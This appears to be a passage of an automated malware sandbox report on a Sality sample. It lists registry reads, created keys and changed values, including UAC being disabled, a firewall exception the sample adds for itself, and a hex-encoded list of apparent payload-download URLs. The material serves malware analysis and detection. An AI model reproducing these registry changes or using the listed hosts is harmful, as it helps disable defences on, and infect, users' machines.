3032 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSCTF.dll generic read object name not found 1
4 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\jusched.win32_sality_NAO.exe query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
3035 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared\ query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
3527 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Keyboard Layout\Toggle query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
3695 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\ query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
251 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPR.dll generic read object name not found 1
1296 HKEY_LOCAL_MACHINE\system\CurrentControlSet\control\NetworkProvider\HwOrder query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
10 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings query value and set value and create sub key and enumerate sub key and notify and create link and read or execute and write and delete and read control and write dac and write owner success or wait 1
14 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system query value and set value and create sub key and enumerate sub key and notify and create link and read or execute and write and delete and read control and write dac and write owner success or wait 1
10 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List query value and set value and create sub key and enumerate sub key and notify and create link and read or execute and write and delete and read control and write dac and write owner success or wait 1
10333 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName query value and enumerate sub key and notify and read or execute and write and read control success or wait 3
10331 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName query value and enumerate sub key and notify and read or execute and write and read control success or wait 3
7 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914\118185024 query value and set value and create sub key and enumerate sub key and notify and create link and read or execute and write and delete and read control and write dac and write owner object name not found 1
7 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914\118185024 query value and set value and create sub key and enumerate sub key and notify and create link and read or execute and write and delete and read control and write dac and write owner success or wait 1
21 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 query value and set value and create sub key and enumerate sub key and notify and create link and read or execute and write and delete and read control and write dac and write owner success or wait 3
2739 HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\PagedBuffers query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
4569 HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
4 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jusched.win32_sality_NAO.exe\RpcThreadPoolThrottle query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
5920 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1119 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mswsock.dll generic read object name not found 1
951 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hnetcfg.dll generic read object name not found 1
1857 HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
1522 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winsock\Parameters query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
2711 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock query value and enumerate sub key and notify and read or execute and write and read control success or wait 2
931 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wshtcpip.dll generic read object name not found 1
951 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASN1.dll generic read object name not found 1
721 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CRYPT32.dll generic read object name not found 1
951 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32\Performance query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1501 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\msasn1 query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
504 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMAGEHLP.dll generic read object name not found 1
136 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WINTRUST.dll generic read object name not found 1
40 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc_os.dll generic read object name not found 1
15 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.dll generic read object name not found 1
8 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache query value and set value and create sub key and enumerate sub key and notify and create link and read or execute and write and delete and read control and write dac and write owner success or wait 1
3555 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters query value and enumerate sub key and notify and read or execute and write and read control success or wait 2
1684 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSclient query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
2525 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCertDlls query value and read or execute object name not found 1
2011 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility query value and read or execute success or wait 1
901 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Apphelp.dll generic read object name not found 1
2332 HKEY_LOCAL_MACHINE\System\WPA\TabletPC query value and wow64 64key and wow64 resource and read or execute object name not found 1
2334 HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter query value and wow64 64key and wow64 resource and read or execute success or wait 1
2200 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers wow64 64key and wow64 resource and generic read object name not found 1
1205 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers wow64 64key and wow64 resource and generic read object name not found 1
12 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\notepad.exe wow64 64key and wow64 resource and generic read object name not found 1
3071 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VERSION.dll generic read object name not found 1
727 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags wow64 64key and wow64 resource and generic read object name not found 2
722 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags wow64 64key and wow64 resource and generic read object name not found 2
1767 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\LevelObjects query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1712 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
1714 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
1713 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
1718 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
1712 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
1716 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
1711 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
1711 HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
1766 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1766 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1766 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1767 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1766 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1766 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1768 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1766 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1768 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1766 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1769 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1768 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1768 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1711 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1711 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1711 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1711 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1711 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1711 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1710 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1710 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1711 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1710 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1716 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1715 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1712 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1710 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1710 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
510 HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
1710 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers query value and enumerate sub key and notify and read or execute and write and read control object name not found 1
1736 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders query value and enumerate sub key and notify and read or execute and write and read control success or wait 1
[ Registry Keys Created ]
Reputation Key Path Access Options Completion Count
2358 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings query value and set value and create sub key and enumerate sub key and notify and read or execute and write and read control non volatile success or wait 1
237 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software maximum allowed non volatile success or wait 1
7 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 maximum allowed non volatile success or wait 1
7 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914\118185024 maximum allowed non volatile success or wait 1
[ Registry Key Values Changed ]
Reputation Key Path Name Type Data Completion Count
10 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings GlobalUserOffline Dword 0 success or wait 1
16 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system EnableLUA Dword 0 success or wait 1
4 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\jusched.win32_sality_NAO.exe String C:\jusched.win32_sality_NAO.exe:*:Enabled:ipsec success or wait 1
4 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914\118185024 1970168136 Dword 45 success or wait 1
7 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914\118185024 -354631024 Dword 0 success or wait 1
7 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914\118185024 1615537112 Dword 0 success or wait 1
6 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914\118185024 -709262048 Dword 35 success or wait 1
4 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914\118185024 1260906088 Dword 189 success or wait 1
4 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914\118185024 -1063893072 String 0600687474703A2F2F6C70626D782E72752F6C6F676F732E67696600687474703A2F2F6D616365646F6E69612E6D79312E72752F6D61696E682E67696600687474703A2F2F6A7273782E6A72652E6E65742E636E2F6C6F676F732E67696600687474703A2F2F737465616D626F792E6831372E72752F6D61696E662E67696600687474703A2F2F72616D6F6F2E7738772E706C2F6D61696E682E67696600687474703A2F2F7777772E756B696B742E6F72672F6D61696E662E676966 success or wait 1
4 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914\118185024 906275064 String 1016B4B29B28E67C4FCC05CDA0785840EA2A186B7B6DE481301383D59D3B23A524AF0F3753A0619708A1CC3A86D3091B0EBB2F4B9B81954F457310E4694FA5392DCA253FC1F0347BBB06B3FD20D31C2DC03736FFDF3F696F1EAA3B6B0757EE1D10642EDF22F15904D3CCF9A6CA26FA2B751D9781A92BB3D98198376D2290BC11 success or wait 1
6 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_0 Dword -862574534 success or wait 1
6 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_0 Dword 5517 success or wait 1
6 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_0 Dword 17000001 success or wait 1
6 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_0 Dword 0 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_1 Dword 994598689 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_1 Dword 1970173125 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_1 Dword 1953302281 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_1 Dword 1970168136 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_2 Dword -1368750411 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_2 Dword -354625763 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_2 Dword -337664815 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_2 Dword -354631024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_3 Dword 1996628968 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_3 Dword 1615541845 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_3 Dword 1632126361 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_3 Dword 1615537112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_4 Dword 835246041 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_4 Dword -709259091 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_4 Dword -725949599 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_4 Dword -709262048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_5 Dword 1964956320 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_5 Dword 1260909541 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_5 Dword 1243906089 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_5 Dword 1260906088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_6 Dword -1809391898 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_6 Dword -1063890371 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_6 Dword -1047191055 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_6 Dword -1063893072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_7 Dword 1243085483 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_7 Dword 906280309 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_7 Dword 923258553 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_7 Dword 906275064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_8 Dword 1377176549 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_8 Dword -1418518579 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_8 Dword -1435472895 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_8 Dword -1418524096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_9 Dword -1962017071 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_9 Dword 551648773 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_9 Dword 568462793 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_9 Dword 551644040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_10 Dword 645236845 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_10 Dword -1773153352 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_10 Dword -1756583279 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_10 Dword -1773155120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_11 Dword 2078314569 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_11 Dword 197014620 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_11 Dword 180176985 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_11 Dword 197013016 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_12 Dword 746190125 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_12 Dword -2127782852 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_12 Dword -2144343775 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_12 Dword -2127786144 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_13 Dword 1576983905 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_13 Dword -157619700 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_13 Dword -140929303 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_13 Dword -157618008 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_14 Dword -512288983 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_14 Dword 1812546574 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_14 Dword 1829386161 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_14 Dword 1812550128 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_15 Dword 2067055713 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_15 Dword -512256270 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_15 Dword -529214087 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_15 Dword -512249032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_16 Dword -861576222 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_16 Dword 1457926474 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_16 Dword 1474654913 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_16 Dword 1457919104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_17 Dword -897559407 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_17 Dword -866884580 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_17 Dword -849931383 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_17 Dword -866880056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_18 Dword 1347397471 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_18 Dword 1103283036 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_18 Dword 1086435665 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_18 Dword 1103288080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_19 Dword 1375955221 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_19 Dword -1221514015 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_19 Dword -1238213095 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_19 Dword -1221511080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_20 Dword -418371599 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_20 Dword 748651541 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_20 Dword 765263841 success or wait 1
